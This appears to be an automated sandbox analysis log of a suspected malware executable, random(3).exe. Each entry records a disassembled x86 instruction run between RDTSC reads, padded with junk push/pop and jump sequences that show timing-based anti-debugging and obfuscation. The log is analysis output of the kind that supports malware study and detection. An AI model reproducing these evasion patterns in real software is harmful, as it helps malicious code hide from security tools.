    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0D0F second address: 79F0D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov ecx, edx 0x0000000e mov si, dx 0x00000011 popad 0x00000012 lea eax, dword ptr [ebx+70h] 0x00000015 pushad 0x00000016 call 00007F29FC4F36A5h 0x0000001b mov dh, al 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F29FC4F36A8h 0x00000026 sbb si, 76E8h 0x0000002b jmp 00007F29FC4F369Bh 0x00000030 popfd 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0D69 second address: 79F0E22 instructions: 0x00000000 rdtsc 0x00000002 mov ax, DEDFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushad 0x0000000d mov edx, 523F6430h 0x00000012 popad 0x00000013 push edx 0x00000014 mov si, E7EBh 0x00000018 pop ecx 0x00000019 popad 0x0000001a push esp 0x0000001b pushad 0x0000001c pushad 0x0000001d mov ecx, 066B38BFh 0x00000022 pushfd 0x00000023 jmp 00007F29FC518EA4h 0x00000028 add esi, 0A994BA8h 0x0000002e jmp 00007F29FC518E9Bh 0x00000033 popfd 0x00000034 popad 0x00000035 pushfd 0x00000036 jmp 00007F29FC518EA8h 0x0000003b xor si, BE08h 0x00000040 jmp 00007F29FC518E9Bh 0x00000045 popfd 0x00000046 popad 0x00000047 mov dword ptr [esp], eax 0x0000004a jmp 00007F29FC518EA6h 0x0000004f lea eax, dword ptr [ebp-18h] 0x00000052 jmp 00007F29FC518EA0h 0x00000057 nop 0x00000058 jmp 00007F29FC518EA0h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0E22 second address: 79F0E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0E28 second address: 79F0E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0E2E second address: 79F0E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0ED7 second address: 79F0EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518EA4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0EEF second address: 79F0EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0EF3 second address: 79F0F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F2A6BCE764Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29FC518E9Ah 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0F0D second address: 79F0F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0F13 second address: 79F0F34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29FC518EA4h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0F34 second address: 79F0F6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 9E14h 0x00000007 pushfd 0x00000008 jmp 00007F29FC4F369Dh 0x0000000d sbb ax, FAD6h 0x00000012 jmp 00007F29FC4F36A1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movsx edi, ax 0x00000023 movzx ecx, di 0x00000026 popad 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0F6F second address: 79F0F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0F75 second address: 79F0F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0F79 second address: 79F0F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0F7D second address: 79F0FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b pushad 0x0000000c mov ah, D9h 0x0000000e mov ax, dx 0x00000011 popad 0x00000012 mov edx, 772406ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F29FC4F369Bh 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0FA3 second address: 79F0FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0FA7 second address: 79F0FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0FAD second address: 79F0FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F29FC518EA1h 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F29FC518E9Dh 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0FEB second address: 79F0FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0FF1 second address: 79F0FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0FF5 second address: 79F1073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F29FC4F369Fh 0x0000000e test eax, eax 0x00000010 pushad 0x00000011 mov bx, cx 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 jne 00007F2A6BCC1D5Ch 0x0000001d pushad 0x0000001e mov eax, edi 0x00000020 jmp 00007F29FC4F36A5h 0x00000025 popad 0x00000026 mov edx, dword ptr [ebp+08h] 0x00000029 jmp 00007F29FC4F369Eh 0x0000002e mov eax, dword ptr [esi] 0x00000030 jmp 00007F29FC4F36A0h 0x00000035 mov dword ptr [edx], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F29FC4F36A7h 0x0000003e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1073 second address: 79F1107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 jmp 00007F29FC518EA8h 0x00000015 popad 0x00000016 mov dword ptr [edx+04h], eax 0x00000019 jmp 00007F29FC518EA0h 0x0000001e mov eax, dword ptr [esi+08h] 0x00000021 pushad 0x00000022 movzx eax, di 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F29FC518EA9h 0x0000002c and si, 39F6h 0x00000031 jmp 00007F29FC518EA1h 0x00000036 popfd 0x00000037 mov di, ax 0x0000003a popad 0x0000003b popad 0x0000003c mov dword ptr [edx+08h], eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1107 second address: 79F1143 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F29FC4F36A5h 0x00000008 jmp 00007F29FC4F369Bh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ah, E5h 0x00000012 popad 0x00000013 mov eax, dword ptr [esi+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F29FC4F369Eh 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1143 second address: 79F1149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1149 second address: 79F114D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F114D second address: 79F118A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 mov dl, C5h 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+10h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx ebx, ax 0x0000001e pushfd 0x0000001f jmp 00007F29FC518E9Ch 0x00000024 adc cx, F238h 0x00000029 jmp 00007F29FC518E9Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F118A second address: 79F11B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 call 00007F29FC4F369Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx+10h], eax 0x00000011 jmp 00007F29FC4F369Fh 0x00000016 mov eax, dword ptr [esi+14h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F11B9 second address: 79F11BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F11BF second address: 79F11DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F36A9h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F11DC second address: 79F11E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F11E0 second address: 79F11F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F11F1 second address: 79F1261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c jmp 00007F29FC518EA0h 0x00000011 mov dword ptr [edx+18h], eax 0x00000014 pushad 0x00000015 mov edi, ecx 0x00000017 push ecx 0x00000018 pushfd 0x00000019 jmp 00007F29FC518EA9h 0x0000001e adc cx, 3656h 0x00000023 jmp 00007F29FC518EA1h 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b mov eax, dword ptr [esi+1Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F29FC518E9Ah 0x00000035 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1261 second address: 79F129E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F29FC4F369Ah 0x0000000c xor esi, 33BC97A8h 0x00000012 jmp 00007F29FC4F369Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [edx+1Ch], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F29FC4F36A0h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F129E second address: 79F12A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F12A4 second address: 79F12AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F12AA second address: 79F12AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F12AE second address: 79F12DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+20h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, 77802080h 0x00000016 push edi 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F12DA second address: 79F12F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 mov cx, 28F3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+20h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F12F1 second address: 79F13DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007F29FC4F36A0h 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 pushad 0x00000015 call 00007F29FC4F369Eh 0x0000001a pushfd 0x0000001b jmp 00007F29FC4F36A2h 0x00000020 jmp 00007F29FC4F36A5h 0x00000025 popfd 0x00000026 pop esi 0x00000027 push edi 0x00000028 pushfd 0x00000029 jmp 00007F29FC4F369Ch 0x0000002e jmp 00007F29FC4F36A5h 0x00000033 popfd 0x00000034 pop eax 0x00000035 popad 0x00000036 mov eax, dword ptr [esi+28h] 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F29FC4F369Dh 0x00000040 or ah, 00000006h 0x00000043 jmp 00007F29FC4F36A1h 0x00000048 popfd 0x00000049 call 00007F29FC4F36A0h 0x0000004e push eax 0x0000004f pop edi 0x00000050 pop esi 0x00000051 popad 0x00000052 mov dword ptr [edx+28h], eax 0x00000055 jmp 00007F29FC4F369Dh 0x0000005a mov ecx, dword ptr [esi+2Ch] 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F29FC4F36A8h 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F13DE second address: 79F13E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F13E4 second address: 79F147B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F29FC4F369Eh 0x00000013 xor si, 1298h 0x00000018 jmp 00007F29FC4F369Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f mov al, 6Ch 0x00000021 mov cl, dl 0x00000023 popad 0x00000024 popad 0x00000025 mov ax, word ptr [esi+30h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F29FC4F369Fh 0x00000032 adc esi, 4138A80Eh 0x00000038 jmp 00007F29FC4F36A9h 0x0000003d popfd 0x0000003e pushfd 0x0000003f jmp 00007F29FC4F36A0h 0x00000044 sbb cx, 0688h 0x00000049 jmp 00007F29FC4F369Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F147B second address: 79F1490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 60DC462Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+30h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1490 second address: 79F1494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1494 second address: 79F149A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F149A second address: 79F14B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F36A7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F14B5 second address: 79F1553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c jmp 00007F29FC518EA5h 0x00000011 mov word ptr [edx+32h], ax 0x00000015 pushad 0x00000016 mov eax, 5C87AB53h 0x0000001b pushad 0x0000001c call 00007F29FC518EA6h 0x00000021 pop ecx 0x00000022 jmp 00007F29FC518E9Bh 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [esi+34h] 0x0000002c pushad 0x0000002d mov si, 71ABh 0x00000031 pushfd 0x00000032 jmp 00007F29FC518EA0h 0x00000037 sbb al, 00000038h 0x0000003a jmp 00007F29FC518E9Bh 0x0000003f popfd 0x00000040 popad 0x00000041 mov dword ptr [edx+34h], eax 0x00000044 jmp 00007F29FC518EA6h 0x00000049 test ecx, 00000700h 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1553 second address: 79F1557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1557 second address: 79F155D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F155D second address: 79F15E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 pushfd 0x00000006 jmp 00007F29FC4F36A7h 0x0000000b adc esi, 2D7AD30Eh 0x00000011 jmp 00007F29FC4F36A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007F2A6BCC1810h 0x00000020 jmp 00007F29FC4F369Eh 0x00000025 or dword ptr [edx+38h], FFFFFFFFh 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F29FC4F369Dh 0x00000030 sbb si, 65F6h 0x00000035 jmp 00007F29FC4F36A1h 0x0000003a popfd 0x0000003b popad 0x0000003c or dword ptr [edx+3Ch], FFFFFFFFh 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 mov bh, ah 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F15E5 second address: 79F15E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F15E9 second address: 79F1618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F29FC4F36A5h 0x0000000b mov cx, E0C7h 0x0000000f pop esi 0x00000010 popad 0x00000011 or dword ptr [edx+40h], FFFFFFFFh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ax, 1ADBh 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1618 second address: 79F161E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F161E second address: 79F1622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1622 second address: 79F1646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29FC518EA7h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F1646 second address: 79F164C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F164C second address: 79F165B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518E9Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7A40BBF second address: 7A40BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7A40BD7 second address: 7A40BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7A40BDD second address: 7A40BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29FC4F36A0h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7A40BFA second address: 7A40C09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7A40C09 second address: 7A40C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F36A4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7A40C21 second address: 7A40C45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e mov eax, ebx 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F29FC518E9Dh 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7A40C45 second address: 7A40C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7A40C49 second address: 7A40C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 798000D second address: 7980072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F29FC4F36A3h 0x00000013 or si, 481Eh 0x00000018 jmp 00007F29FC4F36A9h 0x0000001d popfd 0x0000001e jmp 00007F29FC4F36A0h 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980072 second address: 7980078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980078 second address: 798007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 7980697 second address: 79806E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, si 0x00000010 pushfd 0x00000011 jmp 00007F29FC518EA6h 0x00000016 jmp 00007F29FC518EA5h 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79806E1 second address: 79806F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F369Ch 0x00000009 rdtsc
